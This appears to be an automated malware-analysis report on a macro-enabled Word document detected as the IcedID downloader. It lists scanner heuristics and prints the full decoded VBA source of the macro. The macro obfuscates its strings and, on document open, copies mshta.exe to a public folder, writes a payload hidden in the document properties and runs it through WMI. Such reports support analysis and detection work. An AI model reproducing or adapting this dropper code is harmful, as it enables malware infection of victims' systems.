MALICIOUS
170
Risk Score
Heuristics 6
-
ClamAV: Doc.Downloader.IcedID-87f88705f807f878-9951567-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.IcedID-87f88705f807f878-9951567-0
-
VBA project inside OOXML medium 3 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
CreateObject(a90ZTF).create (a5UmG3) -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECTriggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Sub AutoOpen() -
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/In document text (OOXML body / shared strings)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/mm/In document text (OOXML body / shared strings)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OOXML body / shared strings)
- http://purl.org/dc/elements/1.1/In document text (OOXML body / shared strings)
- http://ns.adobe.com/photoshop/1.0/In document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 15763 bytes |
SHA-256: a73dd3262aabea282e4e01c2bb2dac35781c99079100f359391be0aa128e36f3 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "aZKT1"
Function aCibvM(aSrc0)
' Delphi released literacy
' Went gauge downtown
' Chain inflammatory runner indigent agnostic shroud
' Bats mud disperse surveys
' Uncomfortably
' Adventures weapons boxed valentine subsection
' Pip all slogan smtp facsimile
' Carol trials pdas nixon shift tiller
' Urbanity black corked nee
' Console
' Finesse entitled morgan ulster
' Ye dairy
' Fountain
' Miscarriage campaigns brit
' Settler corpus projector unlikely
' Terrible versatile
' Colorado persistent carey
' Vestry hitachi
' Stuffing dv defects
' Analyze medieval footstool
' Attachment fascinating
axMHcp = aSrc0
aLGM4 = Len(axMHcp)
For ajt8L = 0 To aLGM4 - 1
aY38M = aY38M & Mid(axMHcp, (aLGM4 - ajt8L), 1)
Next ajt8L
aCibvM = aY38M
End Function
Public Function adzLy(aJgf4E)
adzLy = Replace(aJgf4E, ajYwl, "")
' Volkswagen ranger
' Syria
' Fend mica webb fem transcendental
' Destiny obituary sodium
' Compute discontinued dev
' Strictly cards caper councils
' Helps able-bodied
' Oneness expanded context bullying usurp
' Unsaid naming blink glucose violation
' Berne eradicate elapse doe consultants
' Burns regenerate
End Function
Sub AutoOpen()
' Accomplishing quadrant adware pit combines sp
apIHlP
End Sub
Attribute VB_Name = "a8Uln"
Public Const aqLWa As String = "sse)cor)P_2)3ni)W:2)vmi)c\t)oor):st)mgm)niw"
Public Const ajYwl As String = ")"
Public Const aVzJ1 As Integer = -2326 + 2339
Function a4MsXz()
' Calm flows tragedy embankment
' Statewide network msie
' Mephistopheles designation scour abeyance
' Effervescence
' Aphorisms crawford organize unpretending disagreed
' Generated crumb elite samuel
' Horde completed degenerate filing union
' Obviate
' Jaffa tot stagnation sanscrit
' Afterwards elizabethan influences lullaby pb cars
' Finesse herbaceous bear ss stench
End Function
Sub a2NVJ(azZu6)
' Richard navigable
' Weights camera northeast titanic spice iowa bewitch
' Borax consign cog
' Tardy soup
' Replacing nominee plymouth demographic
' Interior locate
' Malt herodotus
' Texan doctrine gorilla arc
' Subterfuge
' Hove prosaic qui taut nurses
' Thongs departmental favourites doctor corner perspicacity oecd
' Chen tight core rebel eileen fakir subscriptions
' Afterthought share infusion failing suckling cocks
' Discursive perverted halfway dioxide
' Inline maw telecommunications
' Teller sensitive
' Broker avi
' Density por finery lottery rotation
' Incorporate suck gui
' Orientation intermittently couples kilometers carp
' Obnoxious homeless portsmouth agreements
' Imprison overt profundity civilian wrathful
' Congestion abashed sesame polity warnings turned
End Sub
Function ahPNq(ar2VpF)
' Announcement conditional
' Standard forest aliment stockings
' Fulsome focused pleasure
' Gibraltar unholy open-mouthed
' Catalonia gem insects
' Headlines assignments retrieve
' Awareness abortion query
' Frame peak
' Chinese crime
' Frontpage improvement zope conservation
' Extract
ahPNq = ActiveDocument.BuiltInDocumentProperties(ar2VpF)
End Function
Public Sub aDUiYj()
If 131 - 67 < 201 Then
Call absw5c
End If
End Sub
Public Sub amfxE()
' Derbyshire excerpt fundraising accumulating
' Nipple exemption particles
' Tin steel rend shoot
' Announced multiple mir
' Nazareth
' Fergus whomsoever talisman
' Cards flag forge unbearable unalterable
' Madcap stenographer
' Values frames divided commit
' Submitting bugle
' Blues bier undignified
If 131 - 67 < 201 Then
Call a7F9d
End If
End Sub
Attribute VB_Name = "aA6c9o"
Public Function a7Cjh(agH3D, aVRASH)
' Perfunctory convex subsidiaries instances investigators romany
' How inhale ionian detroit
' Confusion handheld pos ringtones
' Damps unrelated nude
' Conduce numb philanthropist thing birthright blood outer
' Pre
' Inconsistency pretender badly te
' Completes membership felony bicycle
' Treasurer sir deputy verona
' Pneumonia accepting nonplussed texts strew
' Urchin insertion
' Bi ass
' Collectables
' Stephen fakir
' Bountiful tropical gothic graphic inconspicuous
' Combatant major-domo insulin overcome pull
' Databases ent
' Dualism defraud rep
' Nutrition kidney
' Meddling croup optimist sensitive
' Damn ennui
' Liberate decorative veterinary
' Ni
' Adjectives identifier
' Cartel dogma alertness accrued lothario ginger
' Characterized begone
FileNumber = FreeFile
Open agH3D For Output As #FileNumber
' Lc wanna super hove apricot
Print #FileNumber, aVRASH
' Benign increased stanford
Close #FileNumber
End Function
Sub a9mEZ(a2wQt, aLajh)
' Entries literati overhung navy
' Offhand
' Feel thistle
' Yet burrows
' Gull pressing blazon
' Spears labs charwoman remained concomitant
' Fortieth steven tribunal mileage gospel washer
' Amaze bridesmaid unrequited hawser
' Status arable tells rationally
' Set outlet qualified
' Fifty seizure smuggler monsters
' Deviate sleight dun swish informal
' Muhammad tinder therefore
' Oration
' Shoemakers ciao hollow
' Operated erin jasper
' Grove pulse lombardy love
' Lenders crypt underwear bolivia
' Benz lead blare tc
' Marks guts
' Abodes merchant drivers sixty-three declivity
' Argo xhtml
FileCopy a2wQt, aLajh
End Sub
Function aB9Tja(aaOHyL)
' Largest collection insurance
' Festivals comer catacombs
' Tinkle quartette
' Sandal unified eliminate
' Biotechnology amiably
' Mlb
' English pen embarrass associations
' Buddy nose
' Provided sleeper outcry times
' Stark broadest
aB9Tja = aaOHyL
End Function
Attribute VB_Name = "ao5Sg9"
Sub apIHlP()
' Amenities stood
' Incorporated sanctify
' Accommodated toolkit limitation census
' Hunter screenshots trackback
' Minority
' Creates outside abjure
' Accurate novelty
' Downloads templates ass prices dj
' Gastric
' Under clip porpoise
' Proportional cathay gotten
' Tragedian iso sabre
aDUiYj
' Buckle
amfxE
' Catarrh
' Lintel prominent platinum
' Consumption thunderstorm
' Appendage mother airports chronological
' Napkin lighten early
' Villages police parry erstwhile wayward
' Babylonian class suet showers serbian
' Confirmed wasteful
' Flop aqua
' Levels
' Released luke
' East cadillac stick pendulous
' Muck disclaimed scoop democrat
' Monica leviticus stuffing
' Combative nicer ez portfolio discounted thailand
' Acknowledge populations shoot
' Counseling
' Seasoned convinces
' Likely gust caricature
' Goad sanitation noontide hart
' Complement cb aggravated
' Clinics responsible far-fetched
' Computation attraction hampton secure
' Cricket
' Doric candidates escapade drone uv
' Lemon catch refectory coincide sawing
' Absorb expanded rob theoretic
' Arrange adapt thousands solar bruges
' Carbine refine dynamo inlet
' Hereby unfaithful
' Youth lorenz wheres pillage hr
' Vancouver freak
' Tyrol irresolute assassinate adjust
' Minus unfeeling il
' Navigable
' Kathy resource astride wrapper slavish consistence
' Wise denouement swoop johannes zambia
' Owned trainer
' Arthritis appreciation alex
' Musician many sequence upside sparse
' Broker ericsson particularly undertone
' Batting preposition verdant
' Maine georgetown wrestling
' Filipino handy
a90ZTF = adzLy(aCibvM(aqLWa))
' Muss sal
' Moderate essentially incomplete
' Celia eve familiar
' Isis tacks cnet
' Netherlands ozone ephesians
' Fumble mozambique
' Song modem
' Sloppy objectives
' That april html shear
' Comics reef
' Campus studious correctness
CreateObject(a90ZTF).create (a5UmG3)
End Sub
Attribute VB_Name = "ap1e3v"
Function aUA1i()
' Archives spurious mere well assay
' Predatory queries
' Notification carrier cycles lottery
' Coterie airing dearborn unconsciousness
' Employee
' By lethargy
' Teenage tenement
' Some tacit wv arise comedian
' Trickle webmaster
' Festive buckwheat attractions ambient processes ie register
' Stronghold wired
aUA1i = VBA.Split(aCibvM("l)m)t)h).)s)m)\)c)i)l)b)u)p)\)s)r)e)s)u)\):)C)|)m)o)c).)s)m)\)c)i)l)b)u)p)\)s)r)e)s)u)\):)C)|)e)x)e).)a)t)h)s)m)\)2)3)m)e)t)s)y)s)\)s)w)o)d)n)i)w)\):)c)|)o)t)o)m) )o)l)l)e)h)"), "|")
End Function
Function apuwz(aZWvV)
' Policies states
' Fake carmen indecent providers
' Sill
' Insurance counteract customise mop
' Recipient
' Timothy steve fy sheila elucidation autumn
' Pate compression mpegs cheque updating
' Gauzy
' Underrated whaler insured cn
' Equally crevasse chauffeur
' Drag babble consumptive justify
aSAwKu = aUA1i()
' Unleavened
' Butts clarke dare measurements
' Tibetan wasp cookies
' Crutch grit stripes cadence
' Craftsmen hub kenny rebel
' Wherewithal
' Consistently stunt
' Expectant enrollment bookcase putting
' Columns undisputed
' Preservative annual dab desktop station areas
' Magenta commissions refectory
' Palliation stress
' Decorate fabrication spectral plowing
' Dana fee tests singapore han mg monsters
' Budget frost maneuver
' Cult albanian
' Agone amenities tulle identifier brilliance
' Crafts trace pantheon
' Shark delphi sw
' Ways bedford lake hopefully
' Weeding
' Lingo self-made firms clamber
' Faster deserter routes relentless saffron
' Specialized lexicon
' Cultures richardson shoot
' Accede signals
' Out debates
' Philology mitigate
' Mills concertina untimely
' Incubus changeable generating establishing cramp
' Cox sixty-six matrimony
' Yearn slut
Select Case aZWvV
' Maneuver vote injection nation
' Vacuum
' Roads stop blonde lanky contributors
' Vic bibliography tell panic graham
' Fathers
' Wake gasoline milieu democritus nativity
' Upholstered angels
' Seem piedmont
' Crumb notebooks dna
' Inform perspicuity
' Quote ask suggesting subtlety atmospheric architects
Case 0:
apuwz = aSAwKu(1)
' Dd tights
Case 1:
' Truck spittle blasphemy
apuwz = aSAwKu(2)
' Th signification scholarship flexibility depot
Case 2:
apuwz = aSAwKu(3)
End Select
End Function
Sub a7F9d()
arEUO = akqrMT(apuwz(2))
a7Cjh arEUO, a3xJ5(ahPNq("comments"))
End Sub
Attribute VB_Name = "aLJyO"
Function axeMW(aywd23)
' Discretionary chrome
' Pulsation isthmus
' Beech hockey childrens ipaq
' Belie position trackback conservatory
' Olympus malaria potter prototype nightmare
' Froward ste.
' Monroe journey apollo
' Philadelphia poop disdainful propitiate
' Drawn before royal
' Established attended jacksonville formations preside archangel namesake
' Resistance bundle democrat pills land
' Gilbert
' Vt rivulet untoward vietnam
' Accusing inertia backup repulse
' Exists rhone
' Chime homogeneous sweet
' Guts distrustful saturn
' Allowing exhibition
' Insignia computation portrayed kingdom
' Transmit stealth mental
' Absolve grows candour
axeMW = adzLy(aywd23)
End Function
Function aUOe4r(ap49Ck)
' Threshing
' Gran compares
' Defense ornamentation souvenir charger hiatus reserved contents betty
' Petroleum
' Routine gusto undivided inmate physicians
' Unload hindrance magazine practitioner defines
' Winston exit interactive
' Bartender break
' Merchant christmas promotion croak established
' Eligible mentor forge pigtail angus
' Pens impassive sterile cornwall instruments company
' Divination font regime fabulous
aUOe4r = (adzLy(ap49Ck))
End Function
Function akqrMT(aUcEgm)
' Whole steppe
' Username liability
' Loudness pillage eagle
' Outlay wizard viceroy species trollope loaves
' Numeral asp
' Tomorrow recruiting delivered shovel
' Renunciation comparisons cipher proxy
' Finding festive
' Lavender snort saunter
' Adviser transexual townships
' Basename underlying pea
akqrMT = (adzLy(aUcEgm))
End Function
Function a5UmG3()
aEv82A = aUOe4r(apuwz(1))
aqZRiF = akqrMT(apuwz(2))
a5UmG3 = aEv82A & " " & aqZRiF
End Function
Sub absw5c()
aPrlG1 = axeMW(apuwz(0))
aEv82A = aUOe4r(apuwz(1))
a9mEZ aPrlG1, aEv82A
End Sub
Function aQL5oB(ahjYM)
aQL5oB = ahjYM + 25818 / 993
End Function
Function aQWmO(abmOa)
If abmOa = 0 Then
aQWmO = 26680 / 26680
' Soto stolid yeast embedded breathing
' San trade classroom
' Inquire liberal
' Peroration sprig psychic
' Surgeons
' Revolve simulations feline
' Finds newer dedicated carve bonnie
' Mb shorten sq irruption
' Studies interment zeeland slim namesake overrated
' Purposeless caribbean prolixity articulated marks textile
' Akimbo
' Pasha
' Reference ahead scowl ieee virginian chances
' Funds armoury paths tentative emendation
' Band dragons feet
' Overhead gnu coronation rivet
' Complications tournaments brushing hoary mars
' Profile
' Onset installed
' Clocks gloucestershire debt dealer
' Draper return alfalfa
' Pregnancy wildlife indubitably basename
' Actual expired
' Oem sublimedirectory permalink reorganization
' Leaders trickery
' Treaty burly xi omaha ali
' Conservation
' Artificial welkin thered
' Specialty menstruation
' Inequalities gusto nibble remorseless
' Adolescent logging
' Consign insufferable ww
' Skating bulletin teams ravenna hobby
' Antonio unripe switch cambodia senile
' Forsooth avignon scared foresail
ElseIf abmOa = 5 Then
aQWmO = -173 + 270
Else
aQWmO = 1046 - 22
End If
End Function
Function anuyYd(ahjYM, aAaPI)
anuyYd = ahjYM - aAaPI
End Function
Function ar2mi(ahjYM)
ar2mi = Chr(ahjYM)
End Function
Attribute VB_Name = "akjRdJ"
Function a3xJ5(aaBcK) As String
Dim aPRx7 As Long
Dim a7n0q As Integer
Dim a8HfiQ As Integer
For aPRx7 = 1 To VBA.Len(aaBcK) Step 1
a8HfiQ = 0
aGVHiD = Mid(aaBcK, aPRx7, 1)
a7n0q = Asc(aGVHiD)
' Ti
' Magisterial overdue ninety-five ryan teresa campus
' Orgy senile
' Derbyshire conservative finale
' Lol valley
' Smoking comm tuneful potatoes nefarious because
' River laddie networks gst
' Modena reserved jackson separable ravenna
' Persian blank
' Firewall leakage italic sender facile
' Johns gates exhortation
' Save norm acknowledgement undiscovered
' Lynching criteria composer precept gage routing
' Effusive broken-down flippancy unrelated
' Confident pers triumph show je
' Aid enlighten findlaw fortuitous
' Esperanto errors when pharmaceutical
' Ssl bulgaria sid
' Whisk
' Crispin alien skunk
' Terminal
' Impromptu der
If (a7n0q > 64 And a7n0q < 91) Or (a7n0q > 96 And a7n0q < 123) Then
a8HfiQ = aVzJ1
' Herbaceous stiffen first location madagascar frothy laughable
' Javascript tor thus dutchman scythe debates
' Terrace mosaic petrograd
' Coins concept pills chile
' Affects vindictive
' Tend britannica wills agents
' Recession vagrant
' Slip galleon covert
' Blockhouse
' Presently adder losses prev saddam
' Elucidate treatment advertise
a7n0q = anuyYd(a7n0q, a8HfiQ)
' Communities
' Husky usurper
' Iniquitous adverted drone wrestle charts racy
' Instantaneously
' Tommy
' Mosque
' Lariat Word hair walnut scribe
' Hard moving
' Hermes dawns virginity
' Iowa baseball
' Taut carboniferous awarded
If a7n0q < aQWmO(5) And a7n0q > 83 Then
a7n0q = aQL5oB(a7n0q)
ElseIf a7n0q < 28145 / 433 Then
a7n0q = aQL5oB(a7n0q)
End If
End If
a1Hl8U = ar2mi(a7n0q)
' Geology entity exhilaration
' Myers bawl
Mid$(aaBcK, aPRx7, 1) = aB9Tja(a1Hl8U)
Next
' Annually burma
' Installed rampant albion
' Avant sardonic ponds
' Emendation encroachment ins
' Panic corkscrew relaxing fishing
' Tan eye-witness huh estimation
' Ph edification
' Sponsors horny conch taketh
' Sensors cement
' Stagnant jason sabre
' Teens reg bacchus
a3xJ5 = aaBcK
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 60928 bytes |
SHA-256: b9b42eae38b21cb76132b38d214f0f758f20e70892e766cb3b494c9f9a9d7614 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.